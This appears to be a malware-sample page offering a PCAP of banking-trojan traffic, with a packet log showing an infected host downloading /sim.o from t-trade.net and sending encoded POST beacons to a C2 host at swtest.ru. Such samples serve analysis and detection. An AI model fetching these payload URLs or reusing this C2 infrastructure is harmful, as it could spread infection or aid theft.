Text Example

GET /sim.o t-trade.net Financial Stock Banking Malware Trojan PCAP file download sample

Download Attachments

  • 1 pcap simo
    Date added: May 30, 2019 7:55 am Added by: admin File size: 6 MB Downloads: 48

2019-05-29 21:16:12.610658 IP 10.1.10.162.60446 > 185.219.42.154.80: Flags [P.], seq 649603156:649603684, ack 3701990316, win 16425, length 528: HTTP: GET /sim.o HTTP/1.1
E..8w.@…..
.
…*….P&.(T….P.@)….GET /sim.o HTTP/1.1
Accept: application/x-ms-application, image/jpeg, application/xaml+xml, image/gif, image/pjpeg, application/x-ms-xbap, */*
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Accept-Encoding: gzip, deflate
Range: bytes=240615-
Unless-Modified-Since: Wed, 29 May 2019 23:56:47 GMT
If-Range: “10d200-58a0f88c11a17”
Host: t-trade.net
Connection: Keep-Alive

2019-05-29 21:16:36.990639 IP 10.1.10.162.60447 > 77.222.57.253.80: Flags [P.], seq 1839010927:1839011208, ack 1315819563, win 16425, length 281: HTTP: POST /index.php HTTP/1.1
E..Ax.@….m
.
.M.9….Pm..oNm.+P.@)/…POST /index.php HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)
Host: n500stoker.temp.swtest.ru
Content-Length: 109
Cache-Control: no-cache

J/.4/.=I.>:.>;.L/.I/.5/.>/.9/.>K.>8.N/.I/.;/./.?L.>>.><.>?.?N.(9.N/.8/.5/.4L.>3.?N.>>.>=.>2.(9.(9.(9.K/.> 2019-05-29 21:16:37.647544 IP 77.222.57.253.80 > 10.1.10.162.60447: Flags [P.], seq 42341:43801, ack 281, win 237, length 1460: HTTP J/.4/.=I.>:.>;.L/.I/.5/.>/.9/.>K.>8.N/.I/.;/./.?L.>>.><.>?.?N.(9.N/.8/.5/.4L.>3.?N.>>.>=.>2.(9.(9.(9.K/.>
2019-05-29 21:16:37.647544 IP 77.222.57.253.80 > 10.1.10.162.60447: Flags [P.], seq 42341:43801, ack 281, win 237, length 1460: HTTP
E …0@./..NM.9.

2019-05-29 21:16:45.383337 IP 10.1.10.162.60448 > 77.222.57.253.80: Flags [P.], seq 4169006147:4169006321, ack 1258956205, win 16425, length 174: HTTP: POST /index.php HTTP/1.1
E…~.@…..
.
.M.9.. .P.}.CK
%.P.@)L…POST /index.php HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)
Host: n500stoker.temp.swtest.ru
Content-Length: 43590
Cache-Control: no-cache

Leave a Reply